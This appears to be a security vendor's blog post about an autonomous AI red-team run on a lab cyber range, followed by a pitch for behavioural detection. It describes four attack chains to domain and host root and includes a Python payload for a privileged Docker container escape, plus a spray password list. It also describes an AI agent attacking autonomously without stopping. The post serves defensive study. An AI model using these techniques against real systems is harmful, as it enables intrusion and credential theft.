DeepTempo builds LogLM, a behavioral foundation model for network and log telemetry that sees attacks rules miss. Vigil, our open-source AI-native SOC, turns LogLM detections into investigations and response. This post covers a recent ARTEMIS red-team run, driven by Claude Opus 4.6 through OpenRouter, with no human at the keyboard, and what it changes about how defenders should think about detection.
The asymmetry has shifted
Every security program in production today was designed against an attacker with finite attention. A human adversary has to choose: which host to enumerate, which credential to try, which exploit to prioritize, when to stop. That budget is the defender's best friend. It creates gaps in the attacker's coverage (paths they didn't have time to test) and the whole game of defense in depth relies on those gaps being there.
On April 9, 2026, we pointed ARTEMIS, an open-source red-team orchestration framework, at a hosted cyber range called STARBARS (a Star Wars–themed Active Directory forest with a domain controller named DEATHSTAR). The orchestrator drove Claude Opus 4.6 through OpenRouter. Six-hour session window. No human operator.
In that window ARTEMIS identified 10 live hosts, spawned 55 agent instances across recon, triage, reproduction, and severity phases, produced 13 confirmed findings (8 Critical, 3 High, 2 Medium), rooted two hosts, compromised the domain, and recovered the plaintext Domain Administrator password: iamy0urf4ther, because the range designers have a sense of humor. It found four independent paths to domain compromise and built all four in parallel, even though any single one would have been enough.
A competent human pentester working this range solo would typically take two to five days to produce a comparable findings list. ARTEMIS did it in six hours. For context on cost: the OpenRouter API bill for the session was on the order of tens of dollars.
The strategic point for CISOs and VPs of Security isn't that AI can do red-teaming. That question is settled. The point is that the economic model your detection stack was built against has quietly inverted. The attacker now has infinite attention, and your defenders still have a queue and a shift.
Four chains, built in parallel
ARTEMIS didn't find one way in. It found four, concurrently.
- rsync → Domain Admin on corellian
- Docker API → host root on tython
- libssh auth bypass → root on tython
- FTP upload → PHP web shell on ashla
Chain 1, rsync to Domain Admin. Anonymous rsync on host corellian (port 873) exposed the filesystem. Cleartext credentials committed to a Gitea repository authenticated to Active Directory. DCSync against the DEATHSTAR domain controller returned the full NTDS, including, because DOMAIN_PASSWORD_STORE_CLEARTEXT was enabled, the Domain Administrator password as readable text.
Chain 2, Docker API to host root. Unauthenticated Docker API on host tython (port 2375) accepted container creation requests with no credentials. A privileged container mounting the host filesystem delivered host root in one API call.
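For readers who haven't seen why an exposed Docker daemon is instant host root, a minimal sketch of the request body is below. The `/containers/create` endpoint and the `HostConfig.Privileged` and `Binds` fields are standard Docker Engine API; the image, mount path, and command are illustrative, not the payload ARTEMIS actually generated.

```python
import json

def privileged_escape_payload(host_mount="/", image="alpine:latest"):
    """Container-create body yielding host root: a privileged container
    with the host filesystem bind-mounted inside it. (Illustrative
    sketch; the field names are standard Docker Engine API.)"""
    return {
        "Image": image,
        # chroot into the bind mount and you are operating on the host fs
        "Cmd": ["chroot", "/host", "/bin/sh"],
        "HostConfig": {
            "Privileged": True,                 # full capabilities and devices
            "Binds": [f"{host_mount}:/host"],   # host root mounted at /host
        },
    }

# With the daemon listening unauthenticated on 2375, the whole attack is
# one POST of this body to http://<target>:2375/containers/create,
# followed by a start call. No credentials at any step.
body = json.dumps(privileged_escape_payload())
```

The fix is as short as the exploit: the Docker daemon should never listen on 2375 without TLS client authentication.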
Chain 3, libssh authentication bypass to root. tython also exposed libssh 0.8.1 on port 1337, vulnerable to CVE-2018-10933. Direct uid=0(root) via an authentication bypass that's been public since 2018.
Chain 4, FTP upload to PHP web shell. Host ashla allowed anonymous FTP writes to an /upload/ directory, and the co-located Apache server executed PHP from that same path. Anonymous upload, web shell, www-data RCE.
The credential-reuse layer (iamy0urf4ther recovered from the Gitea repo, confirmed via DCSync, then successfully reused against Portainer, Gitea, and MariaDB) is what turned four separate host compromises into one unified domain-wide outcome. This is the pattern in every real incident we analyze: the initial access is loud and fixable; the lateral movement through reused credentials is what actually burns down the environment.
Two observations before we go deeper.
First, none of this is novel attacker craft. Every finding is something a trained human would identify. Unauthenticated Docker API on 2375, libssh 0.8.1, anonymous rsync, FTP with a writable upload plus PHP execution: these are range-grade vulnerabilities on OSCP study guides. What's different is the assembly: a language model walked the full kill chain, maintained state across hundreds of iterations, triaged its own findings, and classified severity without being told which path to take.
Second, the agent built redundancy for its own sake. ARTEMIS already had root on tython via libssh at 18:13. It built the Docker API path anyway, over an hour later. A human with shell stops. An agent with no ego and no fatigue treats redundancy as a first-class goal. If one path gets patched mid-engagement, the other stays open.
The rsync-to-DA chain: the 52-minute window
Let's zoom into the chain that produced Domain Admin.
18:17 UTC, ARTEMIS connects to corellian:873 with no credentials and pulls the filesystem. Rsync without authentication was a deliberate vulnerability on the range, but the same misconfiguration appears in production networks constantly as a backup target or a developer convenience that never got locked down.
18:18–18:19, anonymous module listing succeeds. Full filesystem enumeration of /root and /etc begins.
18:22–18:32, in parallel with the rsync walk, a separate agent thread starts grepping port 3000 (Gitea) for secrets. This is a key detail: ARTEMIS is not running one attack. It's running several, and it does not care which one wins.
18:32, SSH master keys exfiltrated from /root over rsync. Four seconds of traffic. An Ed25519 starbars-master-key with no passphrase, granting environment-wide SSH access. The agent files it and keeps going; it's already found something better.
18:42, Gitea credential harvest. Somewhere in a config repo, someone committed the Domain Admin password in plaintext. ARTEMIS extracts it and adds it to the credential pool. The credential wasn't brute-forced or cracked. It was read.
19:09, DCSync. ARTEMIS issues an MS-DRSR DRSGetNCChanges call against DEATHSTAR using the harvested credential. This is the same protocol real DCs use to replicate with each other. The request completes successfully in 54 seconds. The response contains the NTDS: every NTLM hash in the domain, every service account, the krbtgt hash (meaning golden-ticket forgery capability that persists until someone rotates that password twice).
Fifty-two minutes from the first unauthenticated rsync packet to full replication of the domain credential store. Not because the techniques were exotic. Every step has a low signature in isolation:
- The rsync pull is a single TCP session to port 873 that completes normally. Nothing malformed, no signature hits.
- Reading a Gitea repository config is indistinguishable from a developer cloning work.
- The DCSync request is a legitimate MS-DRSR call. Every domain controller services these constantly.
Each step, viewed alone, is normal. The attack is the sequence, not any single action.
The AI tells: what you're actually looking at on the wire
This is the part that matters for detection strategy, because it changes what you're looking for. A human attacker's signal on the wire looks like sequential, throttled, hypothesis-driven testing. An AI agent's signal can look fundamentally different, and every one of these signatures showed up in the STARBARS capture.
17:41, the premature lunge. Before mapping the network, the agent took a speculative swing at 10.100.100.105 on ports 389, 636, and 88: the classic domain controller fingerprint. It was wrong. It didn't yet know which host was the DC. It was pattern-matching on "enterprise subnet" and trying the highest-value target first. Five minutes later it abandoned the attempt and restarted with proper discovery.
17:42, the flood. Seventeen seconds of ICMP sweep, then at 17:42:19, the same second the ping sweep completed, a full TCP SYN scan covering ports 1–10000 launched against every live host. Simultaneously. No pause, no throttling, no attempt to blend in. This one scan accounts for roughly 112,000 netflow records, about 80% of the entire capture. A human operator slow-scans, uses decoys, spreads activity over hours. ARTEMIS optimizes for time-to-objective. Stealth isn't weighted in the objective function, so stealth doesn't happen.
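In flow records, a burst like that is easy to separate from legitimate high-volume services once you count distinct targets rather than raw flows. A sketch, with illustrative field layout and thresholds:

```python
from collections import defaultdict

def burst_scan_sources(flows, window_s=60, pair_threshold=1000):
    """Flag sources that touch an abnormal number of distinct
    (dst_host, dst_port) pairs inside a sliding time window.
    `flows` is an iterable of (ts_epoch, src, dst, dport) tuples."""
    flagged = set()
    recent = defaultdict(list)  # src -> [(ts, (dst, dport)), ...]
    for ts, src, dst, dport in sorted(flows):
        events = recent[src]
        events.append((ts, (dst, dport)))
        while events and events[0][0] < ts - window_s:  # expire old events
            events.pop(0)
        if len({pair for _, pair in events}) >= pair_threshold:
            flagged.add(src)
    return flagged
```

A busy web server produces far more flows than this threshold, but to a handful of peers; the SYN scan hits thousands of distinct pairs in seconds. Distinct-pair counting survives where raw flow counting drowns.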
17:57, four enumerations, simultaneously. With the service map back, the agent picked four targets at once: FTP probe against ashla, NFS/RPC/SMB sweep against BOGAN, rsync enumeration against corellian, and the libssh version check against tython. Parallel threads, findings correlated as they came in, each result fed back into the planning context. A human does one of these at a time.
18:38, diverse hypothesis password spray. Three SMB password sprays against DEATHSTAR in three minutes: iamy0urf4ther (cultural reference, fits the naming theme), Password1 (statistical baseline from common wordlists), deathstar!RULES1 (context-derived from hostnames). All three failed. What's interesting is the diversity. A human tends to cargo-cult a single wordlist. The agent generated three categorically different hypotheses and tried them sequentially.
19:13 onward, the redundant root paths. Having already rooted tython via libssh at 18:13, ARTEMIS spent the next hour building two more paths to root on the same host: Portainer credential spray (hit at 19:30 with the reused DA password), then raw Docker API at 19:59 (privileged container, host filesystem mount, host root in one POST). A human stops at shell. The agent's planner treats "at least two paths to every objective" as a first-class goal.
20:16–23:38, the long tail. By 20:00 the mission was functionally complete: domain compromised, two hosts rooted, persistence established. A human writes up the report and logs off. ARTEMIS spent the next three and a half hours doing sustained WordPress enumeration, two full network rescans, a methodical sweep of the .2–.127 range in four 32-host chunks, probes against Wing FTP and TightVNC on hosts that had never been part of any kill chain. If the session window had been twelve hours instead of six, it would have kept going. The planner has no concept of "good enough."
Each of these behaviors is benign considered in isolation. Collectively, they form a fingerprint: the fingerprint of an operator with no attention cost, no time pressure, and no stop condition.
The skeptic's question: can't our existing tools catch this?
This is the objection we hear most. It deserves a serious answer. Let's walk through what a traditional stack sees during the 52-minute rsync-to-DA window.
A signature-based IDS: nothing, until the DCSync triggers a Mimikatz-family rule, and only then if the organization has that rule tuned and the tooling in use is recognized. ARTEMIS composes its own command sequences; Mimikatz-specific signatures miss more often than they hit.
A SIEM with correlation rules: a handful of low-severity events (successful rsync connection, successful authentication, replication request) that individually sit below the alerting threshold. Correlation rules fire on pre-authored patterns like "five failed logins followed by a success." This attack had no failures. Every authentication worked the first time because the credentials were valid.
An EDR on the endpoints: the Linux hosts showed normal service behavior. The DC showed a legitimate replication request from an authorized account. EDR fires if Mimikatz.exe is dropped on disk. It wasn't.
This is the market's central detection problem, and it's been there for a decade: rule-based detection is pattern-matching against known-bad. It misses anything that looks like normal operation from the perspective of the individual signal. What's new is that an AI-driven attacker exploits that gap at an economic cost of pennies per API call.
What LogLM sees that rules miss
LogLM is a behavioral foundation model for network and log telemetry, an encoder-only transformer that learns the joint behavior of services, identities, and endpoints across an environment. Instead of matching individual events against a library of known-bad patterns, LogLM builds a pattern of life for each entity and scores sequences of activity against that learned behavior.
The detection advantage isn't magic. It's a different primitive: instead of asking "does this event match a known-bad signature," LogLM asks "does this sequence of behavior fit the established pattern of life for these entities."
The specific things LogLM would surface on an engagement like this, mapped to flows from the STARBARS capture:
The 112,000-flow scan from a new source. Not because of the volume alone; plenty of legitimate services generate high flow counts. But the peer set is wrong. 192.168.20.2 has no prior relationship with any 10.100.100.x host in the environment's behavioral history, and suddenly it's establishing sessions with ten of them across thousands of ports inside a thirteen-minute window. The behavioral departure is the fingerprint, not the raw count.
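A drastically simplified version of that peer-set check (the hard threshold here is invented; LogLM learns the departure jointly rather than via a cutoff):

```python
def novel_peer_alerts(baseline_pairs, window_flows, min_new_peers=5):
    """baseline_pairs: set of (src, dst) pairs seen in the behavioral
    history. window_flows: (src, dst) flows in the current window.
    One never-seen peer is routine; many at once is the departure."""
    new_peers = {}
    for src, dst in window_flows:
        if (src, dst) not in baseline_pairs:
            new_peers.setdefault(src, set()).add(dst)
    return {src for src, dsts in new_peers.items()
            if len(dsts) >= min_new_peers}
```

A workstation touching one new printer passes; a source with no history suddenly holding sessions with ten hosts does not.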
The rsync extraction. corellian normally serves some megabytes of code across a handful of sessions to known developer workstations. Suddenly it's transferring the entire filesystem, including /root and /etc, to an address that has no prior relationship with it. The individual connection looks clean; the shift in the host's behavioral pattern is what LogLM encodes.
The identity pivot. The credential harvested from Gitea authenticates to the DC from 192.168.20.2, a host inside the attack-jumpbox segment. That identity, in its learned pattern of life, authenticates from workstation subnets to file shares, not from jumpbox segments to domain controllers. Each authentication is valid. The pattern of which identities authenticate from which segments to which targets is part of what LogLM has learned.
The DCSync itself. Domain controllers service replication requests constantly, but the source hosts for those requests form a tight behavioral pattern: almost always other DCs, occasionally specific replication appliances. A DCSync from 10.100.100.201, a host that has never previously sourced MS-DRSR replication traffic, breaks that pattern, even when the protocol exchange is perfectly well-formed.
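The nearest rule-shaped approximation is an allowlist of learned replication sources. The baseline set below is invented for illustration; the alerting source IP is the one from the engagement:

```python
# Hosts that have historically sourced MS-DRSR replication toward this
# DC (other DCs, perhaps a backup appliance). Invented baseline set.
learned_replication_sources = {"10.100.100.11", "10.100.100.12"}

def dcsync_alert(src_ip, dst_is_dc, is_drsr_replication):
    """A perfectly well-formed replication exchange from a source that
    has never sourced replication before is the entire signal."""
    return (dst_is_dc and is_drsr_replication
            and src_ip not in learned_replication_sources)
```

LogLM gets the same effect without maintaining the list: "sources of replication toward this DC" is just another learned peer set.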
The credential-reuse fan-out. Within 90 minutes of the initial rsync, the same credential authenticated against Portainer, Gitea, and MariaDB. Each login succeeded. A rule-based stack sees three valid logins across three services. LogLM sees a temporal cluster of first-time authentications from new source-identity-target combinations: the behavioral signature of credential reuse after compromise.
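A sketch of that temporal-cluster check (field names, window, and threshold are illustrative, not a shipping rule):

```python
from collections import defaultdict

def credential_fanout(auth_events, history, window_s=5400, min_services=3):
    """auth_events: (ts, identity, src, service) successful logins.
    history: set of (identity, src, service) triples from the baseline.
    Flags identities whose first-ever (identity, src, service)
    combinations cluster across several services in one window."""
    firsts = defaultdict(list)  # identity -> [(ts, service), ...]
    for ts, ident, src, service in sorted(auth_events):
        if (ident, src, service) not in history:
            firsts[ident].append((ts, service))
    flagged = set()
    for ident, events in firsts.items():
        for i, (t0, _) in enumerate(events):
            services = {svc for ts, svc in events[i:] if ts - t0 <= window_s}
            if len(services) >= min_services:
                flagged.add(ident)
    return flagged
```

Every login in the cluster succeeds, so failure-based rules stay silent; the anomaly is three first-time source-identity-service combinations landing inside ninety minutes.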
The long-tail scanning. The .2–.127 sweep ARTEMIS ran between 22:35 and 23:38, long after the mission was complete, is the behavioral signature of an agent-driven operator that doesn't know how to stop. A rule-based stack scored those scans as duplicates of the 17:42 event (same source, same behavior, no new alert). LogLM scores them as an unusually persistent reconnaissance pattern continuing hours after the objective was achieved, which is itself a strong anomaly.
None of these detections require signature updates. None require knowing what ARTEMIS is or what Mimikatz looks like. They fall out of modeling behavior as a pattern of life and flagging departures from it.
The Vigil layer: detection without response is half a capability
LogLM's behavioral scores and embeddings feed Vigil, our open-source AI-native SOC. Vigil is 13 agents, 30+ MCP integrations, and 7,200+ detection rules, released under Apache 2.0 at RSA 2026.
On an engagement like the STARBARS run, Vigil's agents would take the LogLM alert on the rsync-to-DCSync sequence and, within the same automated investigation: enrich with Okta/AD identity context, pull the full session reconstruction from the data lake, check for related alerts across the environment, open a case, propose containment actions for analyst review, and draft the incident writeup. The human stays in the loop for decisions; the mechanical work is agent-driven.
The open-source release matters for reasons that connect directly to the ARTEMIS story. If adversaries have access to agentic red-team orchestration running on frontier models (and they do; OpenRouter charges pennies per API call), then defenders need equivalent agentic capability on their side of the line. The asymmetry we described at the top of this post only closes if both sides are playing the same game. A closed, expensive, proprietary AI SOC doesn't rebalance the economics. An open one does.
What this means for your security program
Three concrete implications for anyone running a security program today:
Your threat model should assume AI-driven reconnaissance and exploitation at scale, not as a future risk. The tools are open-source. The underlying models are getting better every quarter. ARTEMIS running on Opus 4.6 in April 2026 does what took a mid-tier human team a week eighteen months ago; whatever runs on the next model will be more capable, faster, and cheaper. The planning-cycle question is not "when will this arrive," it's "what changes do we need to make before it's someone else's incident."
Rule-based detection is a floor, not a ceiling. Every finding in the STARBARS report is catchable with rules if you have the right rule for the right version of the right tool configured on the right host. Nobody does. The real coverage question is what happens when the adversary does something your rules weren't written for, and in an engagement where the adversary tries all the adjacent attacks in parallel, the answer to that question stops being theoretical. Behavioral models close the gap between "catches what you anticipated" and "catches what you didn't."
Credential hygiene is still the single highest-leverage control. The range used a joke password, but the pattern (one credential reused across domain, developer tooling, and infrastructure admin interfaces) is the pattern in every real breach we analyze. If STARBARS had used distinct credentials per system with a vault, the four attack chains would have produced four isolated compromises instead of one unified domain takeover. That's a configuration change, not a purchase.
Closing: the attacker has no queue
The strategic takeaway isn't that an AI agent found eight criticals on a Star Wars–themed cyber range. It's that the economic model your SOC was built against has inverted. Defenders still have a queue: alerts stacked in a backlog, analysts working a shift, budget that forces prioritization. The attacker no longer has one. An agent framework with API access runs every attack in parallel, against every host, until the session window closes or the objective is met, and then keeps running because the objective function doesn't have a stop clause.
The STARBARS defenders weren't outsmarted. They were outscaled. Every individual misconfiguration on that network had been a misconfiguration for years. A human attacker would have found two or three of them. ARTEMIS found all of them, built redundant exploitation paths to each, and then spent three more hours looking for a fourteenth thing.
The question defenders now have to answer isn't "do we have any gaps?" It's "do we have zero gaps?", because the attacker can check all of them in an afternoon, at API-call cost, while everyone on the defense side is asleep.
That's the world we built LogLM and Vigil for. Both are designed for the engagement ARTEMIS previewed on April 9, not the engagement rule-based stacks were built for.
The ARTEMIS framework and STARBARS range are open and reproducible. Netflow data from this engagement is available with phase-level labels for training intrusion detection models. Reach out if you want to run a similar engagement or discuss detection strategy for AI-driven adversaries.
